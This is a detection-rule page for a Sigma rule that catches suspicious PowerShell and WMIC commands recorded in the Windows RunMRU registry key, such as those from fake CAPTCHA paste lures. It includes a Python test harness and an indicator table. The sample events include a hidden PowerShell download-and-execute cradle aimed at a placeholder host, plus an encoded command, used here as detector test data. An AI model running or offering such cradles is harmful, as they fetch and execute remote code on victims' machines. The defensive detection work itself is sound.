
Potentially Suspicious Command Executed Via Run Dialog Box - Registry

Severity: high
Author: Ahmed Farouk, Nasreddine Bencherchali
Source: upstream

Detects commands executed via the Windows Run dialog box (Win+R) by inspecting values written to the "RunMRU" registry key, which Explorer uses to record recently run commands. This technique has been abused by threat actors who trick users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.

MITRE ATT&CK coverage

Tactic | Techniques
Execution | T1059.001 Command and Scripting Interpreter: PowerShell

Event coverage

Provider | Event ID | Title
Sysmon | 13 | RegistryEvent (Value Set)

Sysmon only emits Event ID 13 for registry paths included in its configuration, so the RunMRU key must be covered by the RegistryEvent (Value Set) rules of your Sysmon config for this rule to receive any events. The value data appears in the Details field, which is the field the predicates below inspect.

Stages and Predicates

The RunMRU key predicate (Stage 1) must always match. On top of it, both predicates of one branch must match: the PowerShell branch (a PowerShell launcher plus at least one suspicious keyword) or the WMIC branch (wmic plus at least one suspicious keyword). Within a predicate, "or:" lists alternative values, any of which satisfies it; matching is Sigma's default case-insensitive substring ("contains") match.

Stage 1: selection_key

TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

Stage 2: all of selection_powershell_command

or:
Details|contains: powershell
Details|contains: pwsh

Stage 3: all of selection_powershell_susp_keywords

or:
Details|contains: ' -e '
Details|contains: ' -ec '
Details|contains: ' -en '
Details|contains: ' -enc '
Details|contains: ' -enco'
Details|contains: Hidden
Details|contains: Invoke-
Details|contains: ftp
Details|contains: http
Details|contains: iex

Stage 4: all of selection_wmic_command

Details|contains: wmic

Stage 5: all of selection_wmic_susp_keywords

or:
Details|contains: 'process call create'
Details|contains: shadowcopy
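The following is an added example, not the Sigma rule itself or any tooling from the catalog: it reimplements the predicates above as plain Python and runs them over a handful of constructed Sysmon Event ID 13 records (field names TargetObject and Details follow the Sysmon schema; the SID, value names and command strings are made up). It shows the combining logic, the case-insensitive substring semantics, and three non-alerting cases a practitioner should expect: a plain `powershell` launch with no suspicious keyword, Explorer's own MRUList bookkeeping write to the same key, and an identical command written to a key other than RunMRU.

```python
"""Added example: the RunMRU rule's selection logic applied to constructed
Sysmon Event ID 13 (RegistryEvent, Value Set) records. Illustrative code,
not the Sigma rule or catalog tooling."""

RUNMRU_KEY = r"\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Predicate value lists, copied from the rule's selections.
POWERSHELL_COMMAND = ("powershell", "pwsh")
POWERSHELL_SUSP_KEYWORDS = (" -e ", " -ec ", " -en ", " -enc ", " -enco",
                            "Hidden", "Invoke-", "ftp", "http", "iex")
WMIC_COMMAND = ("wmic",)
WMIC_SUSP_KEYWORDS = ("process call create", "shadowcopy")


def contains_any(value, needles):
    """Sigma '|contains' over a value list: case-insensitive substring
    match, true if any listed value occurs in the field."""
    haystack = value.lower()
    return any(n.lower() in haystack for n in needles)


def matches(event):
    """True when the event satisfies the rule:
    RunMRU key AND (both PowerShell predicates OR both WMIC predicates)."""
    if event.get("EventID") != 13:
        return False
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    if not contains_any(target, (RUNMRU_KEY,)):
        return False
    powershell_branch = (contains_any(details, POWERSHELL_COMMAND)
                         and contains_any(details, POWERSHELL_SUSP_KEYWORDS))
    wmic_branch = (contains_any(details, WMIC_COMMAND)
                   and contains_any(details, WMIC_SUSP_KEYWORDS))
    return powershell_branch or wmic_branch


# Constructed sample events (not real telemetry). Explorer stores each Run
# dialog entry as a REG_SZ value named a, b, c ... under the user's RunMRU
# key, with the data suffixed by "\1", hence the trailing \1 in Details.
_KEY = r"HKU\S-1-5-21-1111-2222-3333-1001\Software" + RUNMRU_KEY
SAMPLE_EVENTS = [
    {   # CAPTCHA-lure style paste: hidden window, download cradle via iex
        "EventID": 13, "TargetObject": _KEY + r"\a",
        "Details": r'powershell -w hidden -c "iex (irm https://example.invalid/v)"\1',
    },
    {   # Encoded command using the short "-e" switch
        "EventID": 13, "TargetObject": _KEY + r"\b",
        "Details": r"pwsh -e SQBFAFgAIAAoAC4ALgAuACkA\1",
    },
    {   # WMIC branch
        "EventID": 13, "TargetObject": _KEY + r"\c",
        "Details": r"wmic process call create notepad.exe\1",
    },
    {   # Benign: PowerShell opened from Run with no suspicious keyword
        "EventID": 13, "TargetObject": _KEY + r"\d",
        "Details": r"powershell\1",
    },
    {   # Benign: Explorer's MRUList ordering value written to the same key
        "EventID": 13, "TargetObject": _KEY + r"\MRUList",
        "Details": "cbda",
    },
    {   # Same command text under a different key: out of scope for this rule
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
        "Details": r"powershell -enc SQBFAFgA",
    },
]


def alerting_values(events=SAMPLE_EVENTS):
    """Names of the registry values (last path component) that fire the rule."""
    return [e["TargetObject"].rsplit("\\", 1)[-1] for e in events if matches(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print("ALERT" if matches(e) else "ok   ", e["Details"])
```

Running the block prints an ALERT line for values a, b and c only. The `"\1"` suffix is worth remembering when writing your own RunMRU queries: an exact-match predicate on the command text would miss it, which is why the rule uses `contains` throughout.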

Indicators

Each row gives a field, the match kind, and the values the rule looks for in that field. The corpus count shows how many other rules in the catalog use the same field-and-value combination: high numbers point to widely used, community-vetted indicators; a blank or a count of 1 means the indicator is specific to this rule.

Field | Kind | Values
Details | match |
  • -e
  • -ec
  • -en
  • -enc
  • -enco
  • Hidden
  • Invoke- (corpus 2; sigma 2)
  • ftp
  • http (corpus 2; sigma 2)
  • iex (corpus 2; sigma 2)
  • powershell (corpus 8; sigma 8)
  • process call create
  • pwsh (corpus 4; sigma 4)
  • shadowcopy
  • wmic
TargetObject | match |
  • \Microsoft\Windows\CurrentVersion\Explorer\RunMRU